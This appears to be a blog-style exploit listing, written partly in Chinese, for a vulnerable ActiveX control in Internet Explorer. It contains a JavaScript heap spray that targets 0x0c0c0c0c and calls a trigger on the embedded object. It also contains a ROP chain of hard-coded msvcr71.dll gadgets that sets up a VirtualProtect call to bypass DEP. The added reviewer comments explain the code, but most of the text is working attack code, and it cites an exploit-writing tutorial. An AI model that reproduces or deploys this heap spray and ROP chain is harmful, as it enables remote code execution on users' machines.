采用inking 大牛的方法
/**
 * Heap spray followed by the trigger call on the embedded object.
 *
 * Reviewer notes (defensive reading of what this listing shows):
 *  - The spray string is built from the seed unescape("%u0c0c%u0c0c"), doubled until it
 *    is at least 0x1002 UTF-16 code units long, then cut to exactly 0x1000 - 10 units.
 *    A fixed 0x0c0c seed grown by a doubling loop to a fixed block size is the classic
 *    IE heap-spray shape and is what spray-detection heuristics look for.
 *  - The ROP section below relies on msvcr71.dll being mapped at a fixed, known base;
 *    a randomized base or a different build of that module invalidates every address.
 *
 * No parameters, no return value. Side effects: creates a detached <img>, assigns an
 * implicit global `obj`, and calls a method on the element with id 'oo'.
 */
function exploit()
{
// NOTE(review): `obj` is never declared (no var/let), so this creates an implicit global.
// Reads the `.object` property of the element with id 'oo' — presumably an <object>/ActiveX
// element in the host page, which is not part of this listing; confirm.
obj = document.getElementById('oo').object;
// Seed: unescape("%uXXXX") yields one UTF-16 code unit per %u, so this is two units of 0x0c0c.
var src = unescape("%u0c0c%u0c0c");
// Grow the string by doubling until it is at least 0x1002 code units long.
while (src.length < 0x1002) src += src;
// Prepend the 5-character literal \\xxx (two backslashes + "xxx"); the page does not say
// what role the prefix plays.
src = "\\\\xxx" + src;
// Truncate to exactly 0x1000 - 10 = 4086 code units.
src = src.substr(0, 0x1000 - 10);
// The <img> is created but never inserted into the document; only its src is assigned.
var pic = document.createElement("img");
pic.src = src;
// IE-specific property; the value is discarded. Presumably this forces the src string
// to be processed/allocated — confirm against the referenced tutorial.
pic.nameProp;
// Trigger: a method call on the embedded object. What definition(1) does is defined by
// the control, not by this script.
obj.definition(1);
}
采用 https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/#IE6_UserSize_0x7ffe0 上面的喷射方法,准确定位0c0c0c0c
rop模块
// ROP chain (the chain may continue beyond this excerpt). Each unescape("%uLLLL%uHHHH")
// entry is one little-endian DWORD 0xHHHHLLLL; every gadget address lies in the
// 0x7c34xxxx-0x7c38xxxx range, i.e. a hard-coded absolute address inside one specific
// build of msvcr71.dll. The chain is therefore only valid where exactly that module is
// mapped at that base (no ASLR for it); a different build or a randomized base invalidates
// every entry. The per-line gadget annotations are in the style of an automated
// gadget-finder dump and are kept as the author wrote them (Chinese notes translated).
// By its own comments the chain's goal is a VirtualProtect call (the
// "ptr to &VirtualProtect()" IAT entry plus PUSHAD to pass the register-loaded arguments).
var rop = unescape("%u0bfc%u0c0c"); // 0x0c0c0bfc (near the 0x0c0c0c0c target named above): get ecx mov ecx,[eax] call ecx+18
rop+=unescape("%u6402%u7c37"); // POP EBP // RETN [msvcr71.dll] — skips the entry below
rop+=unescape("%u24e5%u7c34");// POP EBP MOV EAX,1 POP EBP POP EDI POP ESI POP EBX MOV ESP,EBP POP EBP retn — changes the stack pointer (MOV ESP,EBP)
// Start of the actual ROP chain
rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
rop+=unescape("%u7f97%u7c34"); // POP EAX // RETN [msvcr71.dll]
rop+=unescape("%uf800%uffff"); // Value to negate, will become %u00000201 (dwSize)
rop+=unescape("%u1e05%u7c35"); // NEG EAX // RETN [msvcr71.dll]
rop+=unescape("%u4901%u7c35"); // POP EBX // RETN [msvcr71.dll]
rop+=unescape("%uffff%uffff"); // 0xffffffff (EBX = -1; see INC EBX / ADD EBX,EAX below)
rop+=unescape("%u5255%u7c34"); // INC EBX // FPATAN // RETN [msvcr71.dll]
rop+=unescape("%u2174%u7c35"); // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
rop+=unescape("%u4f87%u7c34"); // POP EDX // RETN [msvcr71.dll]
rop+=unescape("%uffc0%uffff"); // Value to negate, will become %u00000040
rop+=unescape("%u1eb1%u7c35"); // NEG EDX // RETN [msvcr71.dll]
rop+=unescape("%ud201%u7c34"); // POP ECX // RETN [msvcr71.dll]
rop+=unescape("%ub001%u7c38"); // &Writable location [msvcr71.dll]
rop+=unescape("%ub8d7%u7c34"); // POP EDI // RETN [msvcr71.dll]
rop+=unescape("%u7f98%u7c34"); // RETN (ROP NOP) [msvcr71.dll]
rop+=unescape("%u4802%u7c36"); // POP ESI // RETN [msvcr71.dll]
rop+=unescape("%u15a2%u7c34"); // JMP [EAX] [msvcr71.dll]
rop+=unescape("%u7f97%u7c34"); // POP EAX // RETN [msvcr71.dll]
rop+=unescape("%ua151%u7c37"); // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
rop+=unescape("%u8c81%u7c37"); // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]
rop+=unescape("%u5c30%u7c34"); // ptr to 'push esp // ret ' [msvcr71.dll]